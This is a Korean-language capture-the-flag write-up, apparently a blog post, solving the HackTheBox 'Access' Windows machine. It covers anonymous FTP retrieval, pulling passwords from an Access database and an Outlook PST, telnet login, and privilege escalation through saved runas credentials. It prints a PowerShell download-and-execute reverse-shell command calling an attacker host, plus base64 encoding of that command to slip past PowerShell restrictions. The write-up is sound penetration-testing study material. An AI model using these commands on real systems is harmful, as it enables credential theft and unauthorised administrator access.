Access
- MS Access DB읽어오는 방법
- tool설치하거나 칼리에 있는거 사용하거나
- 파워쉘 막혔을떄 어떻게 할지, StoredCredentials
root@kali:/HTB/Access# ftp
ftp> binary
ftp> get backup.mdb
ftp> get "Access Control.zip"
* wget을 사용해서 ftp 익명유저로 다운로드 가능함, 이방법이 ftp접근해서 get하는 것보다 편리함
wget -m ftp://anonymos:anonymous@10.10.10.98
wget -m --no-passive ftp://anonymos:anonymous@10.10.10.98
root@kali:/HTB/Access# file backup.mdb
root@kali:/HTB/Access# strings backup.mdb > backup.txt
engineer
access4u@security
root@kali:/HTB/Access# 7z x -paccess4u@security ac.zip
root@kali:/HTB/Access# file 'Access Control.pst'
Access Control.pst: Microsoft Outlook email folder (>=2003)
Hi there,
The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.
Regards,
John
root@kali:/HTB/Access# telnet 10.10.10.98
login: security
password: 4Cc3ssC0ntr0ller
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security\Desktop>type user.txt
ff1f3b48913b213a31ff6756d2553d38
권한상승
JAWS.ps1 Enumeration
> Stored Credential 취약점
c:\Users\Public\Desktop\ZKAccess.35.lnk
or 파워쉘에서 아래 명령 실행
PS> cmdkey /list
User: Access\Administrator
Shotcut 찾기 명령어
PS> $WScript = New-Object -ComObject Wscript.Shell
PS> $shortcut = Get-ChildItem *.lnk
PS> $shortcut
PS> $WScript.CreateShortcut($shortcut)
니샹 리버스쉘로 관리자 로그인
PS> runas /user:Access\Administrator /savecred <실행할 명령>
PS> runas /user:ACCESS\Administrator /savecred "powershell -c IEX (New-Object
Net.Webclient).downloadstring('http://10.10.14.2/admin.ps1')"
+TIP: Kali에서 파워쉘 명령 base64 인코딩해서 사용
echo -n "윈도에서 실행할 명령" | iconv --to-code UTF-16LE | base64 -w 0
Kali> echo -n "IEX (New-Object
Net.Webclient).downloadstring('http://10.10.14.2/admin.ps1')" | iconv --to-code UTF-16LE | base64 -w 0
PS> runas /user:ACCESS\Administrator /savecred "powershell -EncodedCommand "<base64>"
Typically "runas /savecred" is used to create a shortcut, which the user clicks to run the desired
application. The commands below are used to enumerate all the accessible shortcut (.lnk) files on
the system, and examine them for the presence of the "runas" command
> Get-ChildItem "C:\" *.lnk -Recurse -Force | ft fullname | Out-File shortcuts.txt
> ForEach ( $file in gc .\shortcuts.txt) { Write-Output $file ; gc $file | Select-String runas }
'OSCP > HackTheBox' 카테고리의 다른 글
| [Windows] Batard (0) | 2020.09.27 |
|---|---|
| [Windows] Chatterbox (0) | 2020.09.24 |
| [Windows] Jerry (0) | 2020.09.24 |
| [Linux] SwagShop (0) | 2020.09.18 |
| [Linux] Irked (0) | 2020.09.16 |